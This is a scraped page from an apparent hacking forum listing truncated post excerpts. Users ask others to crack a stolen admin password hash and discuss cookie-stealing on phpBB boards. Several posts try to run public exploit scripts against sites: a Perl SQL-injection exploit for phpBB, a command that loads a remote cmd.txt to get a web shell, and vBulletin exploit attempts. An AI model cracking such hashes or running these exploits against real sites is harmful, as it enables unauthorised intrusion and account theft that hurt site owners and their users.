 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 1424
 Members: 0
 Total: 1424
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
6c9177d30c70f55fb14567fe6417b895
can anyone do that one for me. i tried on 'plain-text.info' but said 'hash limit full on every set'. i tried cain, left it running over night...didn't find it.
i ... |
|
|
|
|
lookatmenow,
Where did you get that has? this will help to figure out what kind it is and how to crack it.
Slimjim100
it's an admin passwd on a site, for ftp or access on the site. i looked ... |
|
|
|
|
GP8Mzr7E4HfmM
I know it's not an md5, but does anyone know what type it is, and how to crack it?? |
|
|
|
|
www.kisobox.com
that site has video tutorials, i think on cookie stealing on 2.0.18. i think it's relatively the same on 2.0.19.
using this method requires you to make a .php file where the cook ... |
|
|
|
|
| well if the board is hacked, it'll probably be taking down and a new version 'phpbb 2.0.19' put up, and a backup of the forums. so you're best off making two or three or maybe more users, and giving t ... |
|
|
|
|
i get the same problem, stops at [+]connected...
although if there's one thing to learn from running a script, if it doesn't work...it's something 'you' are doing wrong.
so the forum is either n ... |
|
|
|
|
creates a user, the password will be the same as the usernam. however, i suggest if you don't want things to look wierd then edit the code a little so your username is 20 characters long 
i'm not ... |
|
|
|
|
Yeah i've registered etc, put my password email username etc.
like i said it told me 'everything went o.k, you should have admin' and i thought, well that worked nice. then i went on to the forum a ... |
|
|
|
|
#!/usr/bin/perl
# Exploit for sql injection in phpbb <=2.0.17
# It works with php5, with register_globals on and magic_quotes_gpc off
# Author: Eax (eax@cc-team.org)
use strict;
use LW ... |
|
|
|
|
it's for fantastic news 2.1.2.
perl fnews.pl http://www.site.com/fnews http://www.site.com/cmd.txt cmd
brings up:
[shell] $ |
|
|
|
|
| I've got an exploit and I end up with something like [shell] $ in dos, although i'm not really sure where to go from there. i can give more information on it if needed... |
|
|
|
|
| Are there any advantages to finding a forum with the html option enabled. that's enabled on the admin panel and not just on the user panel. Specifically are there any html injections i can use? |
|
|
|
|
Sorted. 
I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest ... |
|
|
|
|
o.k. Feel as though i'm getting closer. Although I now get this error:
C:\>perl vb306.pl site.com /forum/ "Is -la"
The script I now have in the .pl file is this:
$serv = $ARGV
... |
|
|
|
|
c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backsla ... |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
